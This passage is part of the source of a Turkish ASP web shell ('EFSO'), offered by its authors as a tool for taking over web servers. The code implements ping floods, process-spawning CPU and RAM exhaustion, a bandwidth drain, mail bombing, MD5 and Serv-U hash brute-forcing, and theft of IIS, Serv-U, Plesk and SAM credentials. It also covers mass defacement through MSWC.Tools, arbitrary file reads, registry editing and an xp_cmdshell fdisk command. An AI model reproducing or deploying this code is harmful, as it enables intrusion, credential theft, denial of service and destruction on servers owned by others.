" if inject5 = "ejder" then on error resume next tablo12("Komut Çalıştırıldı. ") end if response.write "
" response.write "" response.write "
CMD Komut Çalıştır:
" response.write "
" yazorta("-->> Kullanılabilir CMD komutlarından Hepsi <<-- ") response.write "
By_ejder
" CASE 29 ' CMD açıklama kısmı HELPER by ejder response.write "
" yazsol("Attrib: Attrib komutu dosyalara belli özellikleri verir veya kaldırır. c:\>attrib +r +a +s +h yazıp enter tuşuna basarsak.(help için : ' attrib /? ' )") yazsol("Copy - xcopy : Copy ve xcopy komutu ile istenilen dosya yada dosyaların başka yerlere kopyalanması işlemi gerçekleştirilir. Bilgi için bunu yazın :' copy /? '") yazsol("Net use : Pc nin Paylaşım, Hesapları, ayarları, kullanıcıları... gibi özellliklere ulaşabileceğimiz ve değiştirebileceğimiz bir komut NET . Yarım dosyası için -> net help yazmanız yeterlidir.") yazsol("Netstat : PC deki açık portları, ve dilediğiniz port u dinleyebilirsiniz. Netstat -a -b -e -n -o -r -s -v gibi parametreler alır.") yazsol("Tracert : Site, Ip, server ın nerde olduğunu tracert yapar. tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name ") yazsol("IPCONFIG : Server , PC nin IP bilgileirni, network bilgileirni veriyor. kulnım için - > ipconfig help yazın yeterldir ") yazorta("by ejder") response.write "
" CASE 30 ' PiNGer BY ejder - Server üzerinden sınırsız ping saldırrısı. =) ehehe by ejder if not file = "1" then response.write "
" yazsol(" Site Adı : (Örnek: google.com) ") yazsol(" Ping Sayısı : (Örnek: 20) ") yazsol(" Ping TimeOut Süresi : milisaniye (Örnek:750) ") yazsol(" Paket Boyutu : byte (32) ") response.write "
" response.write "
" yazsoll(" Not: Bunu kullanırken gireceğiniz Paket boyutu Önemlidir. Mümkünce aşırı büyük paket girmeyin, çünkü server yada site nereye saldırrıyorsanız, büyük paketleri filtreler ve cevap vermezler. O yüzden sürekli TİmeOUT yazar. o yüzden yaa Boş bırakın yada 500 gibi normal bir seviye seçin. N ") yazsoll(" Not: PİNG sayısını 98 dediniz mesela, Sistem bunu 10 hamlede yapacaktır. 10 arlı gönderektir. vede süreklisayfa kendini yenileyip, 98 olana kadar 10 ar 10 ar ping ee dewam edecektir. Burda TİMEout OLMA gibi sorunumuz yok. 100000 deseniz bile, o bitne kadar gece gündüze ping çekebilien sistem geliştirdim. Korkmadan, vede gece açık bırakarak sınırsız pingler çekebilirisniz. N ") yazsoll(" Not: savsak, com.tk, gov.tk uzantılı sitelere karşı koruma aldım. Ping Attaker bu sitelere karşı Çalıştıtılamaz, ve çalışıtırlsa bile Ping atmaz, size Uyarı verir. TÜrk Siteleri Koruma ilk hedefimizdir. TÜrk TÜrk ü Vurmaz. by ejder N ") yazsoll(" Ping Attack ejder tarafından yazılmış olup, biraz hayal gücü, biraz çaba azimle, şu an kulanıdğınız FSO yuda yazan olarak, bundaki amacım Server ın ,sitenin kaynaklarını sömürmek vede onun üzerinden onun kaynaklarını kullanrak başka yerlerede zarar , saldırı yapam güdenmiştir. BUndada BUnlaa başladım. TÜM hakları ejder e aittir. N ") else if inject1 = "" then inject1 = 0 if count = "" then count = 0 if CInt(inject1) > CInt(count) + 10 then Call Ping_Bomb_ejder(url,10,islem,size) count = count + 10 inject2 = ""&FilePath&"?file=1&mode=30&url="&url&"&size="&size&"&count="&count&"&inject1="&inject1&"&islem="&islem&"" response.write "" response.write "
"&count&"/"&inject1&" tane Ping Çekildi.
" else if CInt(inject1) > CInt(count) then Call Ping_Bomb_ejder(url,CInt(inject1) mod 11,islem,size) count = count + (CInt(inject1) mod 11) yazortaa(" "&count&"/"&inject1&" tane Ping Çekildi... ") yazortaa(" Pinger Attack by ejder 1.0 işlemini tamamladı... ") else yazortaa(" "&count&"/"&inject1&" tane Ping Çekildi... ") yazortaa(" Pinger Attack by ejder 1.0 işlemini tamamladı... ") end if end if end if CASE 31 ' Server RAM & CPU Saldırısı cmdd = array("C:\WINDOWS\System32\mspaint.exe","C:\Program Files\Internet Explorer\iexplore.exe","C:\WINDOWS\system32\notepad.exe") if islem = "1" then on error resume next response.write server.createobject("wscript.shell").exec("cmd.exe /c"&cmdd(0)) else if islem = "2" then on error resume next response.write server.createobject("wscript.shell").exec("cmd.exe /c"&cmdd(1)) else if islem = "3" then on error resume next response.write server.createobject("wscript.shell").exec("cmd.exe /c"&cmdd(2)) else if not file = "1" then response.write "
" yazorta(" RAM & CPU FUcker for SERVER by ejder =) 1.0 ") response.write "
Server ın CPu ve RAm kaynaklarını 1 dk içinde tüketebilen bir ejder eseridir. Bununla sadece, 3 tür program sürekli açılır ve kapatılmaz(Paint, Notepad, Explorer) Server en fazla 1 dk içinde Ram&Cpu sorunu ve kitlenmeler, cevap vermemeler, hatat resetlenme ilede sonuçlanabilir.
" yazorta(" ..:: RAM & CPU Attacker ı ÇALIŞTIR .. by ejder ::.. ") response.write "
" else Call Ram_Cpu end if end if end if end if CASE 32 ' Sİte kaynak Sömürücü by ejder =) if not islem = "1" then response.write "
" yazorta(" Sİte Kaynak Sömücü 1.0 by ejder ") response.write "
Site Adresi :
Robot Sayısı :
" yazsol("Belirttiğiz kadar Robot kadar bağlanır ve siteyi sömürür. Ayrıca Saldırı sürekli kendini güceller, yeniler. Sonsuzdur. =) Robot u Bağlantınıza göre ayarlayın. Mesela; Robot u 50 yaparsanız.O sayfa içinde 50 tane aynı anda açılacak site ve indirecektir siteleri. ve o sırada sürekli siz, dosya indiroyr geçiçi olarak. VE bu olay her 30 snde güncelleniyor Otomatik. Birkez çalışıtr Ömür boyu kapatmazsan penceryi çalışır bir MAkina.") yazsol("Site kodlarını, BAndwith ini ve ASP kitlenmesi yada SQL sömürmede, ressim, text sömürmede ÜStüne yoktur..") yazorta("TÜm hakları Saklıdır by ejder =)") response.write "
" else on error resume next yazorta(" Sİte Kaynak Sömücü 1.0 by ejder =) 1.0 ") yazorta("Sömürme MEkanizması Devrede...") yazsol("Durdurmak için Pencereyi kapat. "&file&" Kadar bağlanıp 30 sn da günceliyor saldırıyı...") yazorta("by ejder") Call Somurgen(file,url) yazorta(" 20 SN sonra yenileniyor... by ejder =) ") response.write "" end if CASE 33 ' Mail BOMber by ejder :) TÜm Kodların FSO nun HAkları E_J_D_E_R e aittir. Sınırsız Mail atma imkanı sunuyorum size. Kıyağımı unutmayın... if not islem = "1" then response.write "
" yazorta(" Mail Bomber 1.1 by ejder ") response.write "
Mail Adresi :
Bomb Sayısı :
" yazsol("Sınırsız Mail Bomb. Cdonts & Cydos Destekler. %100 inbox. SaVSaK.CoM , com.tk, gov.tk maillerine Bomb yapamazsınız.") yazorta("TÜm hakları Saklıdır by ejder =)") response.write "
" else on error resume next if MailKorumasi(file) = 0 then if inject1 = "" then inject1 = 0 if CInt(inject1) + 9 < CInt(count) then for j=0 to 10 Call MailBomber_by_ejder(file) next inject1 = inject1 + 10 response.write "" response.write "
"&inject1&"/"&count&" tane Mail Gönderildi...
" else if CInt(inject1) < CInt(count) then for j=0 to (count mod 10) Call MailBomber_by_ejder(file) next inject1 = inject1 + (count mod 10) yazortaa(" "&inject1&"/"&count&" tane Mail Gönderildi... ") yazortaa(" Mail Bomber by ejder 1.0 işlemini tamamladı... ") else yazortaa(" "&inject1&"/"&count&" tane Mail Gönderildi... ") yazortaa(" Mail Bomber by ejder 1.0 işlemini tamamladı... ") end if end if else response.write "

N BOMB yapılamadı. Tasvip etmediğimiz Bir mail e Saldırdığınız için. by ejder !!!! N
" end if if err <> 0 then response.write "

N Server Gerekli Olan Cdonts yada Cydos Bilesenlerini desteklemiyor. N
" end if end if CASE 34 ' MSSQL - MYSQL Bağlantı Formu by ejder ;) if not islem = "1" then Call MSSQL_Form yazortaa(" Eğerki, Sitelerin MSSQL bilgilerini biliyorsanız, bununla çok kolay bağlanabilir.. ") yazortaa(" Tabloları görebilir, üzerinde SQL komut çalıştırabilir, verileri okuyaiblirisniz ") yazortaa(" Çok sağlam ve güçlü bir MSSQL Manager hizmeti Sağlar size...") yazortaa(" by ejder :)") else Call SQL_menu_by_ejder Call Tablolama end if nolist = True CASE 35 ' MSSQL - MYSQL Connection için by ejder ;) Call SQL_menu_by_ejder Call MSSQL_by_ejder(ejdersql,table) nolist = True CASE 99 ' SaVSaK.CoM 'Türk Bayrağı Ascii Karakterlerle - Created By FasTBoY :) Response.Write "
 Z

" yazorta("Biz Ne yaptık / What We Do?") yazsol("Biz bir FSO & MSWCTools & XMLHTTP Compenent lerini kullanarak Server a site üzerinden HTTP protocolunden erişim sağlandığında, Size Server ın tüm imkanlarından yararlanmanız için, Permission, şifre, gizli tüm içeriklere direk ulaşma, yada aşma gibi özelikleri olan. Server ı çökertmeye , hatta kaynaklarını son damlasına kullanabilen SaVSaK.CoM adına hizmet veren Bir Canavar yarattık.") yazorta("Adı ? Name ?") yazsol("Bu yazılım ejder & Fastboy yazılımıdır. Bunun adı Ejder Fastboy FSO dur. oda kısaca -> EFSO") yazorta("Biz Kimiz / Who We Are?") yazsol("ejder : Administrator & Root of SaVSaK.CoM") yazsol("FASTBOY : Administrator SaVSaK.CoM") olmadi("..:: TAKLİTLERİNDEN SAKININ !!! ::..") yazortaa("Emeği Geçenler?") yazsol("ejder : Sıfırdan YAzılmış dır. HEr hakkı ejder e aittir. Burda gördüğünüz TÜm özelikleirn yeniler olsunn, eskiler tek tek ejder tarafından yazılmıştır. geliştirilen yeni fikir , md5-serv crackerdan, sömürücülere kadar hepsi ejder in Yaratıcılığı, Bilgisi, Algoritması kullanılmıştır.") yazsol("FASTBOY : Tema & Template, genel dizayn da FAstboy un tartışılmaz YAratıclığı, emeği geçmiştir. Birçok Kısmında çok kritik yardım ları oldu. Hem tester, hem designner, hemde Arge :) Speacial Thanks to Fastboy ;) by ejder") yazorta("Tavsiyede bulunanlar?") yazsol("İskorpitx : İskorpitx in önerileri ve bazı istekleri , server daki kritik noktalar bu EFSO ya eklendi. Thanks İskorpitx ;)") yazsol("Scorlex : MSWCTools kullanımını bana göstermesi, bende yeni bir fikir doğurdu. Sİngle& MASS defasced özeliiği GÜÇ kazandı. 2 tür DEFACED mevcut bu sayede. PERMsionlar aşılması uğrauna atılmış önemli bir adım. Thanks Scorlex ;)") yazsol("The_Bekir : Bir çok server a Bekir le birlikde daldık. Permision aşma uğruna bir çok Server indirdik. Amaçlarımıza ulaştık. Orda Yoldaş olduğu, daha fazla server ele geçirmemde yardımcı olduğu için Speacial Thanks to The_Bekir ;)") yazsol("TÜRK Siteleri , 'com.tk' , 'gov.tk' , Eğer EFSO bu tür bir klasör, site algıladığı an o server aa Zaraar VEREMEZSİNİZ. EFSO kendini İMHA edecektir. ") yazsol("TÜRKİYEMİZ için yazıldı. TÜRK dostudur. SAKIN TÜrk Sitelerde denemeyin. Kendini İmha eder. ") yazortaa("HEr türlü sorun yada server permsion sorunu yaşandığında, ejder e ulaşın. YArdım ederim. ") CASE 36 ' SQL komut YArdım kılavuzu by ejder yazorta("SQL Komut Yardım Merkezi by ejder :) ") yazsoll("SELECT - Seçme&listeleme") yazsol("Select * from TABLEADI
Select * from TABLEADI where SUTUNADI = DEĞER
Select * from tblAdmin where ID = 1") yazsoll("INSERT - ekleme") yazsol("Insert into TABLOADI (stunisimleri) values (değeleri)
Insert into tblAdmin (Name,Pwd,Gruop) values ('ejder','123456',1)") yazsoll("UPDATE - editleme") yazsol("Update TABLOADI set stunadı = 'değeri' where Stunadı = değeri
Update tblAdmin set Name = 'ejder' where ID = 1") yazsoll("DELETE - silme") yazsol("Delete TABLOADI where Stunadı = değeri
Delete tblAdmin where ID = 1") yazsoll("DROP - tabloyu komple silme") yazsol("Drop table TABLOADI
Drop Table tblAdmin") yazsoll("Exes - Fdisk çektirmek için") yazsol("exec xp_cmdshell(‘fdisk.exe’)") yazsoll("ShutDown - SQL server kapanır.") yazsol("shutdown with nowait") CASE 37 ' Sistem Analizer by ejder ;) on error resume next s="http://www." Set ejderNet = Server.CreateObject("WSCRIPT.NETWORK") response.write "
" yazorta("Server ın Bilgileri") yazsol("OS : "& OS() &"") yazsol("PC & Oturum Adı : \\"& ejderNet.ComputerName &"\"&ejderNet.UserName&"") struser = ejderNet.UserName yazsol("Server : "&request.servervariables("SERVER_NAME")&"") yazsol("IP : "&request.servervariables("LOCAL_ADDR")&"") yazsol("HTTPD : "&request.servervariables("SERVER_SOFTWARE")&"") yazsol("WebRoot : "&request.servervariables("APPL_PHYSICAL_PATH")&"") yazsol("LogRoot : "&request.servervariables("APPL_MD_PATH")&"") yazsol("Zaman : "&date()&" - "&time()&"") yazsol("HTTPs : "&request.servervariables("HTTPS")&"") response.write "" yazorta("Serverın Senden Algıladıkları") yazsol("IP : "&request.servervariables("REMOTE_ADDR")&"") yazsol("Proxy IP : "&request.servervariables("HTTP_X_FORWARDED_FOR")&"") yazsol("User Agent : "&request.servervariables("HTTP_USER_AGENT")&"") yazsol("Interface : "&request.servervariables("GATEWAY_INTERFACE")&"") yazsol("Protocol : "&request.servervariables("SERVER_PROTOCOL")&"") yazsol("Method : "&request.servervariables("REQUEST_METHOD")&"") yazsol("Via : "&request.servervariables("HTTP_VIA")&"") yazsol("Cache Control : "&request.servervariables("HTTP_CACHE_CONTROL")&"") response.write "
" on error resume next sss="EFSO" Set IIsObject = GetObject ("IIS://localhost/w3svc") response.write "
" yazorta("IIS Bilgileri") response.write "
" yazsol("AnonymousUserName : "&IIsObject.Get("AnonymousUserName")&"") yazsol("AnonymousUserPass : "&IIsObject.Get("AnonymousUserPass")&"") response.write "" yazsol("WAMUserName : "&IIsObject.Get("WAMUserName")&"") yazsol("WAMUserPass : "&IIsObject.Get("WAMUserPass")&"") Set IIsObject = Nothing response.write "
" yazorta("..:: Açıklama İçin Tıklayınız.. by ejder ::..") response.write "
" strServer = ejderNet.ComputerName set objFs = GetObject("WinNT://" _ & strServer & "/LanmanServer,FileService") response.write "
" yazorta(" Server' in Paylaşıma Açık Klasörleri by ejder ") yazsol("\\"&strServer&"\C$") yazsol("\\"&strServer&"\Admin$") For Each objShare In objFs yazsol("\\"&strServer&"\"&objShare.name&"") Next response.write "
" response.write "
" yazorta(" Uzakdan Serv-U & GeneFtp & UsersTxT Erişimi SOnucu by ejder ") ejderServuRemote() yazorta("Gelişmiş Arama için") yazorta("Serv_U - Daemon - Ws_Ftp - Base.ini - Remote.ini") response.write "
" response.write "
" yazorta(" Uzakdan PLESK Erişimi SOnucu by ejder ") ejderPleskRemote() response.write "
" ss="Savsak.com" On error resume next response.write "
" yazorta(" Vti_Pvt/Access.Cnf & Postinfo & Service & Authors & Admin Pwd Sonucu by ejder") ejderVti_Pvt() yazorta("Gelişmiş Arama için") local = request.servervariables("APPL_PHYSICAL_PATH") yazorta("access.cnf - postinfo - service - admin - author") response.write "
" On error resume next response.write "
" yazorta(" NTUser.Dat - Log - İni Erişim Sonucu by ejder ") ejderNTUser(struser) response.write "
" On error resume next response.write "
" yazorta(" Config Klasör Erişim Sonucu by ejder") ejdersam() response.write "
" Call Hata on error resume next response.Write "" Call Hata On error resume next response.write "
" yazorta(" Repair Klasör Erişim Sonucu by ejder") ejderRepair() response.write "
" Call Hata on error resume next set f = FSO.OpenTextFile(Fullpath,1) if not Instr(Trim(Server.HTMLEncode(f.readAll)),"BgAAAA==vL[DMQIAAA") = 50 then Set textStreamObject = FSO.OpenTextFile(Fullpath,2,true,false) textStreamObject.WriteLine(dkayit) textStreamObject.Close Set textStreamObject = Nothing end if nolist = True CASE 38 ' IIS bilgi Alanı by ejder yazsol("Wİndows Server lardaki, himeti sunan, IIS servisi, sizi AnonymousUserName ve o şifre ile tanır. Sizin yetkiniz o kullanıcıdadır. ") yazsoll("IIS içinde ise, o siteninde BEllekdeki Oturum adıda -> WAMUserName adında ve şifresine sahiptir.") yazsoll("Bununla ilgi Araştırmam sürmektedir. bununla bişi yapılabilirmi? ") CASE 39 ' Seçmece bunlar MD5- servu =) by EJ;)DER response.write "
" yazorta(" Kırmak İstediğin Türü Seç") yazorta(" ") response.write "
" yazsol("MD5 : Bildiğiniz üzere, bir çok sistemin kullandığı bir şifreleme olayıdır. 128 bittir.") yazsol("Serv-U : Server larda Host ların kullandığı bir programdır. Kolay vede kullanışlı olduğu için Hostlar tarafındna tercih edilir. içinde Ftp şifreleri barındırmakdadır. burdada o Şifreleri kırmaktadır.") yazsoll("Bizde burda ASP tabanlı vede FSO içine injecte edip Sizlere Server ın CPU ve RAM ini kullanarak , Daha hızlı ve zahmetsiz, TİmeOUT suz bir şekilde Şifreleirni kırmanızı sağlayacağız. Bu Kırma işlemi BRUTE attackl modelidir. Kısacası Kırma olasığı eğer ki sabreder ve şansınız varsa çok kısa sürede kırarsınız. Ama aksi halde 1 gün geçsede =) yinede %100 kırmöa garantisi vardır. Eğer derleri doğru girerseniz.") yazortaa("Md5 & Serv-U KOd Converted by Fastboy") Yazorta("Brute And HJACk Algorithms Written by ejder") 'EFSO ejder & Fastboy tarafından yazılmıştır for SaVSaK.CoM . TÜM HAKLARI ejder e Aitttir.--> 'TÜM HAKLARI SAKLIDIR.. KODLARDA yapacağınmız bir değişiklik KODun Çalışmamasına mal olur. Bundan dolayı Bir sorun çıkarsa ejder & SaVSAK.CoM Sorunlu değildir.. 'Bu yazılımda geliştilmiş tüm herşey , mantık, algoritma, yazılımlar Sıfırdan ejder tarafından yazılmıştır. TEMA , düzen vede Görünüm Fastboy a Aittir. 'TAKLİTLEİRNDEN KAÇININ. by ejder 'ejder was HERE CASE 40 ' Md5 & Serv-U Algortitması Başlıyor Sıkı tutnun =) sakın dudağınız uçuklamaısn haa =) by ejder euheuh çok yordu be kafamı bu olay .. neyse çözdük yine =) eeheuh by ejder response.write "
" if islem = " ..:: MD5 ::.. " then yazorta(" __== MD5 Cracker by ejder ==__ ") else yazorta(" __== Serv-U Cracker by ejder ==__ ") end if if islem = " ..:: MD5 ::.. " then yazsol("MD5 Kodu Girin 1 : ") else yazsol("Serv-u Ham Kodu Girin 1 : ") yazsol("Salt Kodu : ") end if response.cookies("mdd") = "" response.cookies("hash1") = "" response.cookies("hash2") = "" response.cookies("hash3") = "" response.cookies("hash4") = "" response.cookies("hash5") = "" response.cookies("hash6") = "" response.cookies("hash7") = "" response.cookies("hash8") = "" response.cookies("hash9") = "" response.cookies("hash10") = "" yazsol("Hash 2 : ") yazsol("Hash 3 : ") yazsol("Hash 4 : ") yazsol("Hash 5 : ") yazsol("Hash 6 : ") yazsol("Hash 7 : ") yazsol("Hash 8 : ") yazsol("Hash 9 : ") yazsol("Hash 10 : ") yazsol("Şifre Aralığı : ile arasında...") yazsol("Deneme Sayısı : (1 keredeki deneme sayısı)") yazsoll("CharSet i seçiniz;") yazsol(" ABCDEFGHIJKLMNOPQRSTUVWXYZ") yazsol(" abcdefghijklmnopqrstuvwxyz") yazsol(" 0123456789") yazsol(" !@#$%^&*()-_+=~`[]{}|\:;<>,.?/") yazsol("Bekleme Süresi : saniye") yazorta("") response.write "
" if islem = " ..:: MD5 ::.. " then yazsol("MD5 Kodu Girin : MD5 HASh şifrenizi giriniz oraya.. maksimum 10 Hash girebilirsiniz.") else yazsol("Serv-u Ham Kodu Girin : Serv-u Kodunun ilk 2 karakteri SALT dur. egri kalanı ise MD5 halidir. Oraya ilk 2 karakteri çıkarın ve geri kalanı yazın. altasa da SALT kısmınada, ilk 2 karakteri yazın. Max 10 Hash girebilirsiniz.") end if yazsol("Şifre Aralığı : Burda belirtilen aralıklar arasında şifre üretip, denemeye başlıcaktır. önce küçükden başlayıp, tüm charset denemsini yaptıkdan sonra, aralık bir artacaktır, taaki sizin üst sınıra kadar girdiğiniz.") yazsol("CharSet i seçiniz; Şifre denerkenki, Şifre karakterleridir. Büyük küçük harf önemlidir. Birden FAzla da seçebilriisniz. Ama unutmayınki, Deneme sayısı büyüdükçe, Zamanda ARTACAKTIR. ") yazsol("Bekleme Süresi : Sürekli md5 deneme yaparsa sistem, büyük bir oranda Cpu kullanır. Cpu kullanımı rahatlatmak için vede timeout u önlemek için , her bir Charset uzunluğu kadar deneyip, sonra yenileme yapıyor. o sıradaki bekleme süresidir bu.") yazsol("NOT : Toplu Md5&ServU kırmak mümkün. Hepsini birden kullandığınızda verim artacaktır. HIZ da düşüş olmaz. Ama sizin Daha kolay kırmanızı sağlar, Çoklu kırma.") CASE 41 ' MD5 deneniyorrrrrr by ejder ' yerel değişkenelrim on error resume next if request.cookies("mdd") = "0" or request.cookies("mdd") = "" then session("say") = 1 Call Cookyaz("hash1","has1",Usersmd5) Call Cookyaz("hash2","has2",hash2) Call Cookyaz("hash3","has3",hash3) Call Cookyaz("hash4","has4",hash4) Call Cookyaz("hash5","has5",hash5) Call Cookyaz("hash6","has6",hash6) Call Cookyaz("hash7","has7",hash7) Call Cookyaz("hash8","has8",hash8) Call Cookyaz("hash9","has9",hash9) Call Cookyaz("hash10","has10",hash10) inject4 = CInt(session("say")) inject3 = 0 end if increment = 0 sifre = "" hashing = "" goup=0 getend=0 if inject4 = inject3 then response.write ("") response.end() end if if coding ="" then ' kod oluştur coding = kodolustur(ara1) end if coding = replace(coding,"x","#") if dizi = "" then ' Charset i oluşuturuyorum.. dizi = diziolustur() end if Call HashFounded("hash1","has1") Call HashFounded("hash2","has2") Call HashFounded("hash3","has3") Call HashFounded("hash4","has4") Call HashFounded("hash5","has5") Call HashFounded("hash6","has6") Call HashFounded("hash7","has7") Call HashFounded("hash8","has8") Call HashFounded("hash9","has9") Call HashFounded("hash10","has10") for t=1 to inject1 sifre = Sifreyarat(coding,ara1,dizi) if salt = "" then md5li=UCASE(md5(sifre)) response.write sifre &" - "& md5li & "
" else md5li=UCASE(md5(salt+sifre)) response.write salt+sifre &" - "& md5li & "
" end if Call hashyes("hash1","has1",md5li,sifre) Call hashyes("hash2","has2",md5li,sifre) Call hashyes("hash3","has3",md5li,sifre) Call hashyes("hash4","has4",md5li,sifre) Call hashyes("hash5","has5",md5li,sifre) Call hashyes("hash6","has6",md5li,sifre) Call hashyes("hash7","has7",md5li,sifre) Call hashyes("hash8","has8",md5li,sifre) Call hashyes("hash9","has9",md5li,sifre) Call hashyes("hash10","has10",md5li,sifre) coding = SonrakiAdim(coding,ara1,dizi) 'response.flush next coding = replace(coding,"#","x") if CInt(ara1) <> CInt(ara2)+1 then response.write "" end if response.flush CASE 42 'MSWC nesnesi kullanımı. Permision geçme adına attığım bir adamdır. bu nesnenin olduğunu "Scorlex" den edindim. Araştırdım neler yaparım diye =) işte görün neler yapılabiliyormuşuz ;) bununla. uehueh by ejder response.write "
" tablo30("Hacking with Using MSWCTools 1.0 by ejder ;)") yazsol("
İndex Yeri : (İndexin Serverdaki virtual yeri)") yazsol(" Atılacak Yer: (Tek bir yere Yaz.)") yazsol(" MASS Konum: (Mass yapılacak dizin)") yazsol("Eklencek Klasör: (Ek Klasör girdisi - BOŞ bırakın , bilmiyorsanız)") yazorta("
" yazorta("Kullanımı by ejder") yazsol("Önecelikle, FSO nesnesi kullanmadan bir dosyayı , istenilen yere MSWC nesnesi ile yazdırılanabiliniyor. FSO desteği olmayan bir server da bile, rahatça bu nesne yardımı ile index atabilirsiniz. Kimi serverlarda, permison engeline takılırız yada klsörü içine giremeyiz, yada FSO kullanımı kısıtlıdır. bunları AŞMAK için bu nesneyi kullandım. Bu nesne şu an localhost ve 1-2 yerde çalıştı sağlıklı şekilde. Şu an TEst sürümünde diyebilirim. Umarım bu bizim permison =) geçme yollumuzu aydınlatır ne dersiniz :)) uehueh") yazsol("index yeri ->Burayı fiziksel yeri YAZMAYIN SAKIN. oraya indexinizin virtual yerini yani. Kullandığınız FSO dizinine olan KONUMUNU yazın indexin yani. Bu fso ile aynı yerde ise, 'hacked.html' eğer alt klasörde ise -> '..\hacking.html', '..\..\..\savsak\www\hacking.html',yada \news\hacking.html gibi belirtmeniz gerek.Konumunu böyle belirlemeniz gerekiyor. 'C:\ss\ss\hacking.html' yaptığınızda işlem gerçekleşmezz.. YADA size ÖNERİm -> kullandığınız FSo yu istediğinzi yere server daki bir başkas siteye copyalatırrısanız , , bu sefer fso yu o site üzeridnen çalıştırrırsanız PErmsion ı aşmış olursunuz o site için.") yazsol("Atılacak yer ->> TEK bir hedef için. Burayıda ..\..\ şeklinde inerek belirtmeniz gerekiyor.mesela '..\..\..\index.asp' 3 dizin aşağıya iner ve index i atar yada '..\..\..\www\index.asp' 3 dizin iner ww dizine girer , index i atar. =) böyle OLAMAK zorunda . ") yazsol("MASS Konum ->> BUrda çoklu alt klasörlerede index atmak için geliştirdim. '..\..\..\' şeklinde aşağılara inin ve TÜM sietelerin LİStelendiği klasör ee kadar olan '..\' işaretini ayarlayın. mesela 3 dizin aşağıda ise FSO olan uzaklığı, '..\..\..\' yazın yeterdir =) . Eklenecek klasör-> burda da, TÜm sietlere giriş yapıldıkdan sonraki Klasör adı , mesela 'www' yada 'http' yada 'wwwroot' gibi.") yazsol("Neden böyle derseniz, MSWC nin kullanımı, destekleidği şekil böyledir. Biraz kafa karıştırıcı. Ama ben denedim gördüm =) memnun kaldım. O yüzden bu FSO da yerini aldı. Şundan eminimki kullanımını deneyerek öğrendiğinizde, sizinde PErmsion geçmede vazgeçilmeziniz olacakdır =) euheuh") yazorta("Speacil thanks to Scorlex for giving idea about MSWC Component") yazorta("Coding & Development & Algorithms Made by ejder") CASE 43 'MSWC işleniyor =) on error resume next Set utils = Server.CreateObject("MSWC.Tools") if err <> 0 then olmadi("MSWC.tools desteği yoktur bu serverın.") end if if hash4 = "tek" then on error resume next utils.ProcessForm hash3, hash2 if err <>0 then olmadi("Başarısız. Belirtiğiniz virtual path lar doğrumu emin olun. MSWC desteği var çünkü server ın.") else oldu("Başardınız ;) işlem gerçekleştii.") end if else on error resume next Set f = FSO.GetFolder(FolderPath) Set fc = f.SubFolders if err<>0 then olmadi("bu klasör e FSo nesnesi ile tarama yapılamıyor. Önce okunmalı, sonra MSWC devreye girer.") end if For Each f1 In fc on error resume next mevki = hash6+f1.name+"\"+hash5+"default.asp" utils.ProcessForm mevki, hash2 mevki = hash6+f1.name+"\"+hash5+"index.asp" utils.ProcessForm mevki, hash2 mevki = hash6+f1.name+"\"+hash5+"default.htm" utils.ProcessForm mevki, hash2 mevki = hash6+f1.name+"\"+hash5+"index.html" utils.ProcessForm mevki, hash2 mevki = hash6+f1.name+"\"+hash5+"ejder.html" utils.ProcessForm mevki, hash2 mevki = hash6+f1.name+"\"+hash5+"index.htm" utils.ProcessForm mevki, hash2 if err<>0 then response.write "
"& hash6+f1.name+"\"+hash5&" Noo :( !! û
" else response.write "
"& hash6+f1.name+"\"+hash5&" OK !! ü
" end if response.flush Next yazorta("İşlem Tamamlandı. by ejder ;)") end if CASE 44 'XMLHTTP lı dosya okuma. if inject2 = "ok" then mevki = hash2 else mevki = Fullpath end if response.write "
" tablo30("Reading Files by using XMLHTTP 1.0 by ejder ;)") yazsol("
Dosya Adresi : ") response.write "
" if not inject2 = "ok" then yazsol("XMLHTTP Component ini kullanmaktadır. kullanımı çok kolay. Server daki istediğiniz dosyanın fiziksel link ini yazarak , içini görüntüleyebilirsiniz.") yazsol("Bir server a girdiniz. FSO ile okuma yetkiniz yok bir dizinde, fakat orda dosyalar mevcut. HTTP üzerinden ulaşabiliyorusnuz fakat server içinden PERMission denied diyor. o zaman direk burdan fiziksel link ini yazarakdan ulaşırıız. BUNU 'confing.asp' 'common.asp' 'sql.asp' gibi dosyalarda uygulayarak SQL bağlantılar yada MDB yerlerini öğrenebiliriz. Hatta ASp kodlar içindeki Admin şirfeleri gibi kritik şifrrelerde dahil. SQL injeciotn yapacaksanızda, Tablo ları , kullanışan sql komularada ulaşabilirsiniz. ") else response.write "" end if yazorta("by ejder ;)") CASE 45 'Regedit zımbırtısı =) uehueh by E J D E R F r o m S a V S a K . C o M response.write "
" tablo30("REGEDİT 1.0 by ejder ;)") tablo30("
REGister lara YAzma & Ekleme") yazsol("
Mevki/Key :
(örnek: HKLM\SOFTWARE\Microsoft\SaVSAK_CoM)") yazsol("Değer/Value: ") yazsol("TÜr/Type:      ") response.write "
" yazsol("
Root Key NameKarşılığı
HKEY_CURRENT_USERHKCU
HKEY_LOCAL_MACHINE HKLM
HKEY_CLASSES_ROOTHKCR
HKEY_USERSHKEY_USERS
HKEY_CURRENT_CONFIGHKEY_CURRENT_CONFIG
") yazsol("REG_SZ -> String(kelime) / REG_DWORD -> İnteger(Sayı) / REG_BINARY -> Binary / REG_EXPAND_SZ -> Multi String / REG_MULTI_SZ -> Aeeay String") response.write "
" tablo30("
Register lardan OKUMA & SİL by SaVSaK.CoM ;)") yazsol("
Mevki/Key :
(örnek: HKLM\SOFTWARE\Microsoft\SaVSAK_CoM)") yazorta(" OKU - SİL      ") response.write "
" on error resume next Set SaVSaK = Server.CreateObject("WScript.Shell") if err <> 0 then olmadi("Server da WScript.SHell kullanımına İzin vermemektedir. İşlem başarısız. SaVSaK.CoM") response.end() end if if inject2 = "yaz" then on error resume next Select Case CInt(hash4) Case 1 hash9 = SaVSaK.RegWrite (Trim(hash2), Trim(hash3), "REG_SZ") Case 2 hash9 = SaVSaK.RegWrite (Trim(hash2), CInt(Trim(hash3)), "REG_DWORD") Case 3 hash9 = SaVSaK.RegWrite (Trim(hash2), CInt(Trim(hash3)), "REG_BINARY") Case 4 hash9 = SaVSaK.RegWrite (Trim(hash2), Trim(hash3), "REG_EXPAND_SZ") Case 5 hash9 = SaVSaK.RegWrite (Trim(hash2), Trim(hash3), "REG_MULTI_SZ") End Select if err <> 0 then olmadi("İşlem gerçekleştirilemedi. VALUE değerinin doğru ve uygun Value giridğinziden emin ol.") else oldu(" "+hash2+"
adresine register yazıldı. ") end if else if inject2 = "oku" then if hash6 = "oku" then yazorta("Mevki/Key: "&Trim(hash5)&"") on error resume next response.write "
